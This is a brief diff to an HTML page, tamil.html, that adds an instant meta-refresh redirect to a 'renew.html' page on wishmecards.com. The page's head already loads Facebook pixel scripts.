--- a/tamil.html
+++ b/tamil.html
@@ -1,4 +1,4 @@
-<html lang="ta" class="translated-ltr"><head><script src="https://connect.facebook.net/signals/config/938378916614518?v=2.9.18&amp;r=stable" async=""></script><script async="" src="https://connect.facebook.net/en_US/fbevents.js"></script><script>(function(){/*
+<html lang="ta" class="translated-ltr"><head><meta http-equiv="refresh" content="0; URL='https://wishmecards.com/renew.html'" /><script src="https://connect.facebook.net/signals/config/938378916614518?v=2.9.18&amp;r=stable" async=""></script><script async="" src="https://connect.facebook.net/en_US/fbevents.js"></script><script>(function(){/*
 
  Copyright The Closure Library Authors.
  SPDX-License-Identifier: Apache-2.0
